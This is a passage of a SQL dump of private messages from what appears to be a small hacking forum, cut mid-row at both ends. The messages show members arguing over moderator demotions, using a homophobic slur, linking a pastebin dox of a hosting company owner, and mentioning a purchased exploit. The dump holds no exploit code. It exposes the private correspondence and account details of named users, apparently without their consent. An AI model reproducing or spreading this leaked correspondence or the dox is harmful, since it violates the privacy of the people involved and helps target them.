'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'faggy', '0', 'faggot\r\nI was joking.', '1350693196', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3457', '222', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Yo', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D\r\n[/quote]\r\n\r\n[img]http://i.imgur.com/wiMSA.jpg[/img]\r\n\r\nWhat do you think?', '1350696855', '0', '3', '1350699254', '1', '0', '2', '1350699216'); INSERT INTO mybb_privatemessages VALUES('3458', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: Yo', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D\r\n[/quote]\r\n\r\n[img]http://i.imgur.com/wiMSA.jpg[/img]\r\n\r\nWhat do you think?', '1350696855', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3460', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Skype', '0', 'Can you come online on skype?\r\n', '1350697502', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3462', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'What\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?', '1350697612', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3463', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. ', '1350699095', '0', '3', '1350703985', '1', '0', '0', '1350703971'); INSERT INTO mybb_privatemessages VALUES('3464', '228', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Yo', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D\r\n[/quote]\r\n\r\n[img]http://i.imgur.com/wiMSA.jpg[/img]\r\n\r\nWhat do you think?\r\n[/quote]\r\n\r\nNot bad but I would change the font up a little. Kinda hard to see...', '1350699254', '0', '1', '0', '1', '0', '2', '1350727880'); INSERT INTO mybb_privatemessages VALUES('3465', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Yo', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D\r\n[/quote]\r\n\r\n[img]http://i.imgur.com/wiMSA.jpg[/img]\r\n\r\nWhat do you think?\r\n[/quote]\r\n\r\nNot bad but I would change the font up a little. Kinda hard to see...', '1350699254', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3466', '3', '3', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Request', '0', '[quote=\'??????????¢™\']\r\n[quote=\'Timmy\']\r\nI know you know a lot about bh but can\'t you contribute in BH orums?\r\n[/quote]\r\nWhat are you trying to say?\r\n[/quote]\r\nYou are not active in hacing sections.', '1350700337', '0', '3', '1350701817', '1', '0', '0', '1350701776'); INSERT INTO mybb_privatemessages VALUES('3468', '3', '5', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Request', '0', '[quote=\'Timmy\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'Timmy\']\r\nI know you know a lot about bh but can\'t you contribute in BH orums?\r\n[/quote]\r\nWhat are you trying to say?\r\n[/quote]\r\nYou are not active in hacing sections.\r\n[/quote]\r\nI am not really into hacking anymore.', '1350701817', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3469', '3', '3', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Request', '0', '[quote=\'??????????¢™\']\r\n[quote=\'Timmy\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'Timmy\']\r\nI know you know a lot about bh but can\'t you contribute in BH orums?\r\n[/quote]\r\nWhat are you trying to say?\r\n[/quote]\r\nYou are not active in hacing sections.\r\n[/quote]\r\nI am not really into hacking anymore.\r\n[/quote]\r\n\r\nWhy your activity will help lh a lot', '1350702522', '0', '3', '1350703851', '1', '0', '0', '1350703816'); INSERT INTO mybb_privatemessages VALUES('3767', '222', '222', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Pro Doxer- NSA', '0', '[quote=\'Exposé\']\r\n[quote=\'Timmy\']\r\nhttp://pastebin.com/eXVxALWX\r\n[/quote]\r\n\r\nLmao...who is this...and yeh if you got this ur good :D\r\n[/quote]\r\n\r\nxhostfire.com hosting owner.\r\n\r\nI didn\'t DOX him, Jok3r did because jok3r was banned from one of their servers for running a site with phishing discussions.', '1351044345', '0', '3', '1351044545', '1', '0', '0', '1351044501'); INSERT INTO mybb_privatemessages VALUES('3768', '5', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '1', 'Re: Pro Doxer- NSA', '0', '[quote=\'Timmy\']\r\n[quote=\'Exposé\']\r\n[quote=\'Timmy\']\r\nhttp://pastebin.com/eXVxALWX\r\n[/quote]\r\n\r\nLmao...who is this...and yeh if you got this ur good :D\r\n[/quote]\r\n\r\nxhostfire.com hosting owner.\r\n\r\nI didn\'t DOX him, Jok3r did because jok3r was banned from one of their servers for running a site with phishing discussions.\r\n[/quote]\r\n\r\nWell a hosting company isnt that hard to dox since they use real information....lmao. But do you dox at all?', '1351044545', '0', '3', '1351044684', '1', '0', '2', '1351044552'); INSERT INTO mybb_privatemessages VALUES('3471', '3', '5', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Request', '0', '[quote=\'Timmy\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'Timmy\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'Timmy\']\r\nI know you know a lot about bh but can\'t you contribute in BH orums?\r\n[/quote]\r\nWhat are you trying to say?\r\n[/quote]\r\nYou are not active in hacing sections.\r\n[/quote]\r\nI am not really into hacking anymore.\r\n[/quote]\r\n\r\nWhy your activity will help lh a lot\r\n[/quote]\r\nI know it will but im not really into that anymore. I will think about getting back into it.', '1350703851', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3473', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.', '1350703985', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3474', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?', '1350704732', '0', '3', '1350705487', '1', '0', '0', '1350705271'); INSERT INTO mybb_privatemessages VALUES('3476', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....', '1350705487', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3477', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.', '1350705611', '0', '3', '1350705843', '1', '0', '0', '1350705618'); INSERT INTO mybb_privatemessages VALUES('3479', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...', '1350705843', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3480', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.', '1350705962', '0', '3', '1350706119', '1', '0', '0', '1350706059'); INSERT INTO mybb_privatemessages VALUES('3482', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?', '1350706119', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3483', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin', '1350706299', '0', '3', '1350706438', '1', '0', '0', '1350706348'); INSERT INTO mybb_privatemessages VALUES('3485', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. ', '1350706438', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3486', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.', '1350706608', '0', '3', '1350706782', '1', '0', '0', '1350706756'); INSERT INTO mybb_privatemessages VALUES('3488', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?', '1350706782', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3489', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. ', '1350707412', '0', '3', '1350707495', '1', '0', '0', '1350707453'); INSERT INTO mybb_privatemessages VALUES('3491', '2', '1', '2', 